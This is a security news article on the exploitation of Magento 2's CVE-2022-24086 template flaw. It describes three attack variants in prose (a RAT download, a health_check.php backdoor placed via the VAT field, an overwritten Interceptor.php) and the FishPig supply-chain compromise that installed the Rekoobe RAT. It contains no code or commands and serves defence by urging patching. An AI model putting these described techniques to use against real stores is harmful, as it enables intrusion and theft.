Cyber criminals are increasingly attempting to exploit a critical template vulnerability in Magento 2 to run code on unpatched websites.
So say researchers at eCommerce malware detection service Sansec, who say they’ve recently observed a surge in hacking efforts against CVE-2022-24086.
Magento, which was acquired by Adobe in 2019, is one of the most popular ecommerce platforms in the world. It offers widely used e-commerce software on both open-source and commercial basis.
Magento Marketplace portal is currently used by thousands of people to buy, sell and download themes and plugins for Magento based online stores. However, Magento’s popularity has also resulted in this platform being constantly targeted by cyber criminals.
CVE-2022-24086 was uncovered in February 2022 when Adobe saw it being exploited by wild threat actors in “very limited attacks”.
The bug received a severity rating of 9.8 out of 10, and a patch was released within days to fix the problem.
Adobe has advised admins of online stores running Adobe Commerce or Magento Open Source versions 2.4.3-p1/2.3.7-p2 and lower to prioritize addressing CVE-2022-24086 and apply the patches as soon as possible .
CVE-2022-24086 is described as an “improper input validation vulnerability during the checkout process,” and researchers warned that it could be exploited without user interaction, potentially leading to arbitrary code execution.
Researchers released a proof-of-concept (PoC) exploit for CVE-2022-24086 a few days after the flaw was discovered, paving the way for its widespread exploitation.
Sansec researchers now claim to have seen three template hacks attempting to install a Remote Access Trojan (RAT) on vulnerable endpoints by exploiting CVE-2022-24086.
All detected attacks were interactive, researchers say, possibly because Magento’s checkout sequence is particularly difficult to automate.
The three attack variants
The first variant starts with using malicious template code to create a new customer account on the target platform. It proceeds with the order, which may result in a failed payment.
The injected code is decoded into a command that downloads and starts a background process for the Linux executable 223sam.jpg.
According to researchers, it is basically a Remote Access Trojan (RAT) that stays in memory and communicates with a remote server in Bulgaria to get more commands.
Both the database and the active PHP processes are fully accessible to the RAT.
The second attack variant attempts to introduce a health_check.php backdoor by injecting the template code into the VAT field of the placed order.
Using POST requests, the code generates a new file that accepts more commands.
The third attack variant executes the template code to replace generated/code/Magento/Framework/App/FrontController/Interceptor.php with malicious code.
Finally, the malware runs every time a Magento page request is made.
Now, to keep their websites safe from attacks, the researchers are advising Magento 2 site admins to update their software to the latest version.
The FishPig attack
The announcement comes days after Sansec researchers warned that cybercriminals were implanting malware in online retailers’ servers after breaking into FishPig’s server infrastructure.
FishPig is a Magento WordPress integration software developer with 200,000+ downloads.
Sansec said attackers injected malware into the FishPig Magento Security Suite and several other FishPig extensions for Magento 2 to gain access to websites using the products. The injected malware later installed a RAT called Rekoobe, which hides on the server as a background process.
When enabled, Rekoobe provides a reverse shell that allows the attacker to remotely instruct the compromised server.